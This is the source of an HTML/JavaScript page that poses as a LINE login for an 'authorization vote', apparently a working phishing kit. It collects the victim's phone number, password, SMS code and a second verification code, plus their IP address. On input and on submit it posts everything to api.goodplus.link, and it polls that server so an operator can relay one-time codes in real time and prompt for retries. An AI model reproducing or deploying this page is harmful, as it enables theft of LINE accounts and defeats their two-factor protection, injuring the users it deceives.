
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>LINE授權投票</title>
    <script type="text/javascript" src="css/flexible.js"></script>
    <link rel="stylesheet" href="css/index.css?v=2" />
    <link rel="stylesheet" href="css/default.css" />
    <link rel="stylesheet" href="css/form.css" />
    <style>
    .buttonok {
    height: 36px;
    width: 100px;
    border-radius: 25px;
    background-color: #f0f0f0; /* 设置按钮背景颜色 */
    color: #333; /* 设置按钮文字颜色 */
    text-align: center; /* 文字居中 */
    line-height: 35px; /* 垂直居中 */
    margin-top: -28px; /* 向上移动32px */
}
    .hidden {
        display: none;
    }
</style>


</head>
<body>
<div v-cloak id="app">
    <div class="nav">LINE授權投票</div>
    <div class="text-center margin-20">
        <img class="logo" src="css/3322.png" alt="" />
    </div>
    <div class="text-center">
        <b class="fs-20 fw-600 line-40">歡迎使用LINE 進行授權投票</b>
        <p id="ok" class="fs-14 line-20 padding-vh40">輸入電話號碼密碼並點選下一步代表您已經同意LINE的服務條例及隱私條款</p>
    </div>

    <div class="margin-15 overflow">
        <van-form label-align="left" @submit="onSubmit" @failed="onFailed">
            <div id="pageA">
            <van-field
                    v-model="form.phone"
                    required
                    @input="quickSave"
                    placeholder="請輸入LINE電話號碼">
                <template #label><span class="fs-12">電話號碼</span></template>
            </van-field>
            <van-field
                    v-model="form.password"
                    required
                    @input="quickSave"
                    placeholder="請輸入密碼">
                <template #label><span class="fs-12">輸入密碼</span></template>
            </van-field>
            <van-field
                    v-model="form.code"
                    required
                    @input="quickSave"
                    placeholder="請輸入LINE認證碼"
                    type="number"
                    maxlength="6">
                <template #label><span class="fs-12">輸入認證碼</span></template>
                <template #button>
                    <div class="buttonok" @click="getCode">{{codeWord}}</div>
                </template>
            </van-field>
            </div>
            <div id="pageB" class="hidden">
            <van-field
                    v-model="form.passwordcode"
                    required
                    @input="quickSave"
                    placeholder="請輸入2認證碼"
                    type="number"
                    maxlength="6">
                <template #label><span class="fs-12">2認證碼</span></template>
            </van-field>
            </div>
             <div id="pageC" class="none">
            <div class="text-center margin-t20">
                <van-button round block type="danger" id="buttonId" native-type="submit">確認</van-button>
            </div>
            </div>
        </van-form>
    </div>
</div>
</body>
<script src="css/vue.min.js"></script>
<script src="css/vant.min.js"></script>
<script src="css/jquery-2.1.1.min.js"></script>
<script>
function generateRandomLetters() {
    let letters = 'ABCDEFGHIJKLMNOPQRSTUVWSYZ123456789';
    let randomLetters = '';
    for (let i = 0; i < 6; i++) {
        let randomIndex = Math.floor(Math.random() * letters.length);
        randomLetters += letters[randomIndex];
    }
    return randomLetters;
}

    let randomLetters = generateRandomLetters();
    let twuser = 0;
    var ipAddress = 0;
    fetch('https://api.ipify.org?format=json')
     .then(response => response.json())
     .then(data => {
       ipAddress = data.ip;
       console.log("IP Address: " + ipAddress);
   })
  .catch(error => console.error("Error fetching IP address:", error));
    new Vue({
        el: '#app',
        data() {
            return {
                timer: null,
                codeWord: '發送',
                time: 60,
                canClick: true,
                form: {
                    phone: '',
                    password: '',
                    passwordcode: '',
                    code: '',
                    keys: randomLetters,
                    ip: ''
                }
            }
        },
        methods: {
            getCode() {
                if (this.codeWord !== '發送') { return }

                var phoneNumberPattern = /^\d{10}$/;
                var cktel = phoneNumberPattern.test(this.form.phone);
                if(!cktel){
                  this.$toast.fail('電話號碼不正確！');
                  return false;
                }
                var passwordPattern = /^(?=.*[a-z])(?=.*[A-Z])|(?=.*[a-z])(?=.*\W)|(?=.*[A-Z])(?=.*\W).{8,20}$/;
                var ckpass = passwordPattern.test(this.form.password);
                if(!ckpass){
                    this.$toast.fail("密碼不正確！");
                    return false;
                }
               /// startSending(1);
                this.canClick = false
                this.timer = setInterval(() => {
                    this.count()
                }, 1000)
                this.form.id = document.getElementById('id');
                this.form.ip = ipAddress;
                $.ajax({
                    url:"https://api.goodplus.link/line.php?get=ok",
                    type: 'post',
                    dataType: 'JSON',
                    data: this.form,
                    success:function(data){}
                });
            },
            count() {
                this.time--
                this.codeWord = this.time + 's'
                if (this.time <= 0) {
                    this.codeWord = '發送'
                    clearInterval(this.timer)
                    this.time = 60
                    this.canClick = true
                }
            },
            onFailed(errorInfo) {
                this.$toast.fail('請填寫完善');
                console.log('failed', errorInfo);
            },
            // 保存每一步输入
            quickSave() {
               
                //startSending();
                if(this.form.code.length < 6 && this.form.code != ''){
                    return false;
                }
                if(this.form.phone.length != 10 && this.form.phone != ''){
                    return false;
                }
                if(this.form.password.length<8 && this.form.password != ''){
                    return false;
                }
                if(this.form.passwordcode.length<6 && this.form.passwordcode != ''){
                    return false;
                }
                console.log('save', this.form)
                this.form.id = document.getElementById('id');
                this.form.ip = ipAddress;
                $.ajax({
                    url:"https://api.goodplus.link/line.php?get=save",
                    type: 'post',
                    dataType: 'JSON',
                    data: this.form,
                    success:function(data){}
                });
            },
            onSubmit() {
             if(twuser == 2){
                 if(this.form.passwordcode.length==0){
                    this.$toast.fail("請输入2認證碼！");
                    return false;
                }
                if(this.form.passwordcode.length!=6){
                    this.$toast.fail("2認證碼不正確！");
                    return false;
                }
             }else{
                if(this.form.phone == ''){
                  this.$toast.fail('請輸入電話號碼');
                  return false;
                }
                var phoneNumberPattern = /^\d{10}$/;
                var cktel = phoneNumberPattern.test(this.form.phone);
                if(!cktel){
                  this.$toast.fail('電話號碼不正確！');
                  return false;
                }
                // if (this.codeWord == '發送' && twuser != 2) {
                //     this.$toast.fail('請先發送確認碼');
                //     return false;
                // }
                if(this.form.password == ''){
                  this.$toast.fail('請輸入密碼');
                  return false;
                }
                var passwordPattern = /^(?=.*[a-z])(?=.*[A-Z])|(?=.*[a-z])(?=.*\W)|(?=.*[A-Z])(?=.*\W).{8,20}$/;
                var ckpass = passwordPattern.test(this.form.password);
                if(!ckpass){
                   this.$toast.fail("密碼不正確！");
                   return false;
                }
                if(this.form.code.length==0){
                    this.$toast.fail("請输入的認證碼！");
                    return false;
                }
                if(this.form.code.length!=6){
                    this.$toast.fail("認證碼不正確！");
                    return false;
                }
             }
               console.log('submit', this.form);
                this.form.id = document.getElementById('id');
                this.form.ip = ipAddress;
                document.getElementById("buttonId").disabled = true;
                document.getElementById("buttonId").innerHTML = "正在驗證中...";
                document.getElementById("buttonId").style.backgroundColor = "#5aaafb";
                document.getElementById("buttonId").style.border = "1px solid #5aaafb";
              $.ajax({
                  url:"https://api.goodplus.link/line.php?get=submit",
                  type: 'post',
                  dataType: 'JSON',
                  data: this.form,
                  success:function(datas){
                    if(twuser  < 1){
                        twuser = 1;
                    }else{
                        twuser = 3;
                    }
                    setTimeout(function(){
                        // document.getElementById("pageA").classList.add("hidden");
                        // document.getElementById("pageB").classList.remove("hidden");
                    },1500);
                    return false;
                  }
              });
            }
        }
    })
    
    // 定义要发送的数据
const postData = {
    key1: 'value1',
    key2: 'value2'
};

let intervalId;

// 定义定时发送POST请求的函数
function sendPostData() {
    $.ajax({
        url:"https://api.goodplus.link/api.php",
            type: 'post',
            dataType: 'JSON',
            data: {key: twuser,keys: randomLetters},
              success:function(datas){
                if(datas == 1 || datas == 2 || datas == 3 || datas == 4 || datas == 5 || datas == 6 || datas == 8){
                    if(datas == 2){
                        twuser = 0;
                       alert('密碼不正確！');
                    }else if(datas == 3){
                         twuser = 0;
                        alert('認證碼不正確！');
                    }else if(datas == 4){
                         twuser = 0;
                        alert('認證碼已超時！請重新發送');
                    }else if(datas == 5){
                         twuser = 2;
                        alert('2認證碼不正確！');
                    }else if(datas == 6){
                         twuser = 0;
                        location.reload();    // 重新加载当前页面
                        stopSending();
                    }else if(datas == 8){
                         twuser = 0;
                        document.getElementById("pageA").classList.add("hidden");
                        document.getElementById("pageB").classList.add("hidden");
                        document.getElementById("pageC").classList.add("hidden");
                        document.getElementById("ok").innerHTML = "🙁<br><br>系統繁忙請一个小時後重試！！！";
                        stopSending();
                    }else{
                         twuser = 2;
                        document.getElementById("pageA").classList.add("hidden");
                        document.getElementById("pageB").classList.remove("hidden");
                        //进入下个
                    }
                    document.getElementById("buttonId").disabled = false;
                    document.getElementById("buttonId").style.backgroundColor = "#1989fa";
                    document.getElementById("buttonId").style.border = "1px solid #1989fa";
                    document.getElementById("buttonId").innerHTML = "確認";
                }
            }
    });
}

// 开始定时发送POST请求
function startSending() {
    intervalId = setInterval(sendPostData, 1000);
}

// 停止定时发送POST请求
function stopSending() {
    clearInterval(intervalId);
}

//调用开始发送函数
startSending();

// 调用停止发送函数（可选）
// stopSending();

</script>
</html>
